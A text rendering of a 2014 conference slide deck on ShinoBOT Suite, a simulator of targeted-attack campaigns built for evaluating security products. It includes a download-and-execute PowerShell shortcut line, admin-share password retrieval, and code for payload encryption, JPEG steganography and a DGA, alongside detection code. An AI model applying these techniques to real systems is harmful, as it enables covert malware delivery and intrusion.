ShinoBOT Suite

ShinoBOT Suite is a cyber attack campaign simulator. This slide deck was presented at the Black Hat USA 2014 Arsenal.
Slide 1: ShinoBOT SUITE
The APT Simulator Tool Kit
@Sh1n0g1

Slide 2: About Me
- Shota Shinogi, @Sh1n0g1
- http://shinosec.com
- Security Researcher at Macnica Networks Corp., a Japanese distributor of security/network products
- Enthusiast of writing (ethical) malware
- Presented ShinoBOT (not the Suite) at last year's Arsenal

Slide 3: ShinoBOT the RAT (ShinoBOT.exe)
- ShinoBOT is a RAT (simulator)
- Presented at Black Hat USA 2013 Arsenal
- It connects to ShinoC2, the C&C server, using HTTP(S)
- What you can do with ShinoBOT via ShinoC2: execute a command, upload/download a file, take a screenshot
- It is a SIMULATOR: it has a GUI, and you need the password shown on that GUI to control it

Slide 4: What is ShinoBOT Suite
ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly sophisticated attack campaign.
What is contained:
- Exploit (a shortcut containing a malicious script)
- Malware delivery server (ShinoMAL.mooo.com)
- Downloader/Dropper (ShinoDownloader.exe)
- RAT (ShinoBOT.exe)
- C&C server (ShinoC2)
- Steganography, crypto, DGA and some evasion techniques

Slide 5: Why ShinoBOT Suite?
- There is a bunch of new security tools to detect and respond to unknown threats: sandbox-based malware detection systems, ETDR (Endpoint Threat Detection & Response), SIEM (Security Information & Event Management), security analytics / network forensics
- It is hard to evaluate those new products: known malware is detected by signature, so it is not an "unknown threat"; simulating a realistic APT requires a high skill level, takes too much time, and costs a lot of money when done with commercial tools
Slides 6-7: ShinoBOT Suite Campaign
Components in the diagram: Malicious Shortcut, Downloader/Dropper (ShinoDownloader, saved as dldr_tmp), RAT (ShinoBOT.exe), Decoy File, C&C Server (ShinoC2), Malware Deploy Server (ShinoMAL), and the carrier image img.jpg.
Flow, as numbered in the diagram:
1) Download: the malicious shortcut downloads the downloader (dldr_tmp) from the malware deploy server
2) Execute: the shortcut runs the downloader
3) Drop: the downloader drops the decoy file
4) Open: the decoy file is opened for the user
5) Download: the downloader fetches img.jpg from the malware deploy server
6) Decrypt: the RAT is decrypted out of img.jpg
7) Execute: ShinoBOT.exe is started
8) C2 Communication: ShinoBOT talks to the C&C server (ShinoC2)
Slides 8-12: DEMONSTRATION STEP1 through STEP4 (screenshots only; no slide text)

Slide 13: DEMONSTRATION RUN
The decoy file opens; ShinoBOT works in the background.
Slides 14-15: DEMONSTRATION CONTROL1-2
To control ShinoBOT (the RAT) you need to grab its password; this is to prevent abuse of ShinoBOT. ShinoBOT saves its password in a text file in the user's profile folder (C:\Users\%USERNAME%\sb.pas). You can read the password file remotely through the administrative share: \\%MACHINENAME%\C$\Users\%USERNAME%\sb.pas (the C$ share requires administrator credentials on the target, which the person running the simulation is expected to have). This password protection exists to stop real attackers from abusing ShinoBOT.

Slide 16: DEMONSTRATION CONTROL3
- Access ShinoBOT.com
- Go to the host list
- Your host will appear in the host list
- Click the [View/Assign Jobs] link

Slide 17: DEMONSTRATION CONTROL4
- Enter the password to see the Loot (result) of the command
- Enter the password to assign a new job
Slide 18: Technical Detail 1, Malicious Shortcut
The "target" of the shortcut (all on one line):

cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('DOWNLOADERURL', '%TEMP%\LicenseRnd.txt'); & %TEMP%\LicenseRnd.txt & ::DECOYFILENAME

- PowerShell downloads the downloader and saves it under %TEMP% ("Rnd" stands for a random string)
- CMD then executes the downloaded file
- CMD ignores the last part of the line, because :: marks a comment
Slide 19: Technical Detail 2, Extension Spoofing
The target of the shortcut contains the path "%TEMP%\LicenseRnd.txt" (previous slide). Usually, when you double-click a .txt file, Notepad launches. CMD.exe, however, can execute an executable (a file starting with the MZ header) regardless of its extension. ShinoBOT Suite uses this technique to spoof the extension and make the downloader harder to find on disk. The file is actually ShinoDownloader.exe.
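A detection-side check for this technique, added here as an example and not part of ShinoBOT Suite: scan a folder for files whose extension says "document" but whose content is a PE image (an MZ header whose e_lfanew field points at the PE signature). The file names, the extension list and the MZ/PE stub used as test data are constructed for the example.

```python
import os
import struct
import tempfile

# Extensions that are expected to carry a PE image. This list is an assumption
# of the example; tune it for your environment.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx", ".drv", ".efi"}


def is_pe_image(head: bytes) -> bool:
    """True if the data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", head, 0x3C)
    return head[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_spoofed_executables(directory: str) -> list:
    """Return paths of files whose extension is not executable but whose bytes are a PE image.

    Only the first 4 KiB of each file is read; an e_lfanew beyond that simply fails the
    check, which is acceptable for a first-pass triage scan.
    """
    hits = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        if os.path.splitext(name)[1].lower() in PE_EXTENSIONS:
            continue
        with open(path, "rb") as fh:
            head = fh.read(4096)
        if is_pe_image(head):
            hits.append(path)
    return sorted(hits)


def build_fake_pe() -> bytes:
    """Constructed MZ/PE skeleton for the test: enough header to pass is_pe_image, not a program."""
    dos_header = bytearray(0x40)
    dos_header[:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x80)      # e_lfanew -> PE signature at 0x80
    stub = bytes(dos_header) + b"\x00" * (0x80 - len(dos_header))
    return stub + b"PE\x00\x00" + b"\x00" * 0x40


def demo() -> list:
    """Drop three constructed files in a temp dir and return the names the scan flags."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "notes.txt"), "w") as fh:
            fh.write("just a text file\n")
        with open(os.path.join(tmp, "LicenseAbcd.txt"), "wb") as fh:   # PE bytes under .txt
            fh.write(build_fake_pe())
        with open(os.path.join(tmp, "tool.exe"), "wb") as fh:          # PE bytes, legit extension
            fh.write(build_fake_pe())
        return [os.path.basename(p) for p in find_spoofed_executables(tmp)]


if __name__ == "__main__":
    print(demo())
```

Point the scan at %TEMP% (or any user-writable folder) after running the campaign: the downloader is found by what it is rather than by what it is called, which is exactly the property the extension trick is meant to defeat.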
Slide 20: Technical Detail 3, Crypto Stuff
- ShinoBOT Suite uses XOR and ROR (a 4-bit rotate)
- The key is used only for the XOR; the ROR is always 4 bits
- ShinoBOT Suite generates a random key of 200 to 255 bytes, so it is a little bit difficult to decrypt the whole file without having the key
Note that a 4-bit rotate of a byte is a nibble swap with no key material in it, so the scheme is a repeating-key XOR with a fixed byte permutation on top; with a known plaintext such as the PE header of the RAT, the key can be recovered.

Slide 21: Technical Detail 4, Steganography
The encrypted RAT is hidden in the kitten image.
[Binary visualizer view: JPG data, followed by the encrypted RAT.]
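The two techniques of slides 20 and 21 carried through in code, as an added example that is not ShinoBOT Suite's own implementation: XOR with a random 200 to 255 byte key plus a 4-bit rotate, and hiding the result after the JPEG's End-Of-Image marker. The slides do not say whether the XOR or the rotate is applied first, so the order here is an assumption, as is the exact way the image is parsed; the cover "image" and the stand-in RAT bytes are constructed for the example.

```python
import os

# --- Technical Detail 3: XOR with a repeating key, then a 4-bit rotate -------------------

def ror4(b: int) -> int:
    """Rotate one byte right by 4 bits. On a byte this swaps the nibbles, so it is its own inverse."""
    return ((b >> 4) | (b << 4)) & 0xFF


def random_key() -> bytes:
    """Random key of 200..255 bytes, the length range the slide gives."""
    return os.urandom(200 + os.urandom(1)[0] % 56)


def encrypt(plain: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key, then ROR 4 (order assumed by this example)."""
    return bytes(ror4(p ^ key[i % len(key)]) for i, p in enumerate(plain))


def decrypt(cipher: bytes, key: bytes) -> bytes:
    """Undo encrypt: ROR 4 again (self-inverse), then XOR with the key."""
    return bytes(ror4(c) ^ key[i % len(key)] for i, c in enumerate(cipher))


# --- Technical Detail 4: hide the ciphertext after the JPEG's End-Of-Image marker ---------

def jpeg_end(data: bytes) -> int:
    """Offset just past the real EOI (FF D9), found by walking segment headers and scan data.

    A plain search for FF D9 is not enough: an EXIF APP1 segment often holds a thumbnail
    that ends with its own FF D9, and the appended ciphertext may contain FF D9 as well.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected a marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                                   # EOI: end of the picture
            return pos + 2
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        seglen = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seglen                                    # skip marker + length-prefixed body
        if marker == 0xDA:                                   # SOS: entropy-coded data follows
            # Inside scan data, FF 00 is a stuffed byte and FF D0..D7 are restart markers;
            # any other FF xx is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def embed(cover: bytes, payload: bytes) -> bytes:
    """Append the payload after the cover's EOI; image viewers ignore trailing bytes."""
    return cover[:jpeg_end(cover)] + payload


def extract(stego: bytes) -> bytes:
    """Return whatever follows the real EOI (what a dropper would decrypt and run)."""
    return stego[jpeg_end(stego):]


def build_cover() -> bytes:
    """Constructed JPEG-shaped container (not a decodable picture) with an EXIF thumbnail
    whose own FF D9 would fool a naive search, plus stuffed bytes and a restart marker."""
    def seg(marker: int, body: bytes) -> bytes:
        return b"\xff" + bytes([marker]) + (len(body) + 2).to_bytes(2, "big") + body
    thumbnail = b"\xff\xd8" + b"\x00" * 8 + b"\xff\xd9"
    app0 = seg(0xE0, b"JFIF\x00")
    app1 = seg(0xE1, b"Exif\x00\x00" + thumbnail)
    sos = seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    return b"\xff\xd8" + app0 + app1 + sos + scan + b"\xff\xd9"


def roundtrip(rat: bytes, key: bytes) -> bytes:
    """Encrypt, hide in the cover, extract and decrypt; returns the recovered bytes."""
    stego = embed(build_cover(), encrypt(rat, key))
    return decrypt(extract(stego), key)


if __name__ == "__main__":
    sample_rat = b"MZ" + bytes(range(256)) * 4            # constructed stand-in for ShinoBOT.exe
    key = random_key()
    assert roundtrip(sample_rat, key) == sample_rat
    print("recovered %d bytes through the JPEG" % len(sample_rat))
```

For an analyst the useful observation is the mirror image of the dropper's job: because the carrier stays a valid JPEG, `jpeg_end` gives the exact offset where the trailer starts, and since the rotate is key-independent, XORing the first 255 trailer bytes (after undoing the nibble swap) against the expected DOS header of a PE yields the key directly.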
Slide 22: Technical Detail 5, Domain Generation Algorithm
ShinoBOT (the RAT) uses a pseudo-DGA. It generates a random host name for the C2 server of the form rrrr.r.shinobot.com, where each "r" is replaced by a random character. The DNS for shinobot.com answers any host name with the C2 server's IP address, so every generated name resolves.
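Both sides of the pseudo-DGA in code, added here as an example and not ShinoBOT's own implementation: the client-side name generator, a model of the wildcard answer the slide describes, and a detection rule that matches the shape of the names instead of any single FQDN. The character set, the placeholder C2 address (TEST-NET-1) and the DNS log lines are all constructed for the example.

```python
import random
import re
import string

# Character set for the random labels. The slide only says "a random character";
# lowercase letters and digits are an assumption of this example.
ALPHABET = string.ascii_lowercase + string.digits
C2_IP = "192.0.2.10"          # placeholder C2 address (TEST-NET-1), not ShinoC2's real IP


def generate_c2_host(rng=random) -> str:
    """Fill the slide's pattern rrrr.r.shinobot.com with random characters."""
    four = "".join(rng.choice(ALPHABET) for _ in range(4))
    one = rng.choice(ALPHABET)
    return "%s.%s.shinobot.com" % (four, one)


def wildcard_resolve(qname: str) -> str:
    """Model the server side: any name under shinobot.com gets the C2 address, like a wildcard record."""
    name = qname.lower().rstrip(".")
    if name == "shinobot.com" or name.endswith(".shinobot.com"):
        return C2_IP
    raise LookupError("NXDOMAIN")


# Detection side: match the shape of the generated names rather than one FQDN,
# since each infected host queries a different one.
DGA_PATTERN = re.compile(r"^[a-z0-9]{4}\.[a-z0-9]\.shinobot\.com$")


def is_shinobot_dga_host(qname: str) -> bool:
    return DGA_PATTERN.match(qname.lower().rstrip(".")) is not None


def flag_dns_queries(log_lines) -> list:
    """Return (client, qname) for each 'timestamp client qname' line whose name matches."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        client, qname = parts[1], parts[2]
        if is_shinobot_dga_host(qname):
            hits.append((client, qname))
    return hits


# Constructed DNS query log for the example; not real traffic.
SAMPLE_LOG = [
    "2014-08-06T10:00:01 10.0.0.5 ab3z.q.shinobot.com",
    "2014-08-06T10:00:02 10.0.0.5 www.example.com",
    "2014-08-06T10:00:03 10.0.0.7 k9p2.m.shinobot.com",
    "2014-08-06T10:00:04 10.0.0.9 shinobot.com",
]


if __name__ == "__main__":
    host = generate_c2_host(random.Random(2014))
    print(host, "->", wildcard_resolve(host))
    print(flag_dns_queries(SAMPLE_LOG))
```

The practical consequence for the tools slide 5 wants to evaluate: an exact-FQDN indicator list never sees the same name twice, so the alert has to key on the parent domain or on the label pattern, and sinkholing the C2 means taking over the zone rather than one host record.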
Slide 23: All Components are customizable, modulable
Diagram: the same eight-step flow (1 Download, 2 Execute, 3 Drop, 4 Open, 5 Download, 6 Decrypt, 7 Execute, 8 C2 Communication) with each component swapped out: a phishing email carrying Invitation.pdf as the exploit, a shellcode stage, a downloader/dropper named KB1234567.exe, the legitimate Invitation.pdf as the decoy file, img.jpg from the malware deploy server, ShinoBOT.exe as the RAT, and the C&C server.

Slide 24: Thank you
Visit my site and get the recipe of ShinoBOT SUITE: http://shinosec.com
